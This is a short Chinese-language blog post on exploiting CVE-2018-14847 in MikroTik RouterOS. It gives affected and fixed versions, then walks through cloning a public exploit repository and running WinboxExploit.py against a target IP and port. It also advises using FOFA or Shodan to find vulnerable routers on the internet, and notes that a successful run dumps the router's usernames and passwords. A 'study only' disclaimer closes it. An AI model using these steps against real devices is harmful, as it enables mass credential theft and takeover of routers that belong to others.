CVE-2018-14847 简单利用

华盟原创文章投稿奖励计划

MikroTik RouterOS是一个基于Linux开发的网络设备操作系统,兼容x86、ARM、MIPS等多种CPU架构,因此RouterOS也可以安装在PC上将其作为软路由,提供防火墙、VPN、无线网络等多种功能与服务。RouterOS提供了多种途径对其进行管理与配置,包括SSH、Telnet、Web界面(Webfig)与客户端软件(Winbox)等。

来自全球知名高科技网络安全公司Tenable的安全研究人员Jacob Baines针对CVE-2018-14847发布了一段新的概念验证(PoC)代码,实现了在受漏洞影响的MikroTik路由器上的远程代码执行。

CVE-2018-14847 简单利用

影响范围

6.42.7以及6.40.9之前的所有Mikrotik RouterOS固件版本

修复方式

RouterOS版本6.40.9、6.42.7、6.43

漏洞利用

下载CVE-2018-14847

git clone 

https://github.com/jas502n/CVE-2018-14847

cd CVE-2018-14847

python WinboxExploit.py ip

CVE-2018-14847 简单利用

利用FOFA搜索有漏洞的版本,ShoDan也可以。

CVE-2018-14847 简单利用

搜索到目标后,利用CVE-2018-14847,语法为:


python3 WinboxExploit.py ip port

CVE-2018-14847 简单利用

利用成功后会自动显示用户名和密码。

注:本实验不得用于商业用途,仅做学习交流,一切后果自行承担。

本文原创,作者:张,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/263981.html

发表评论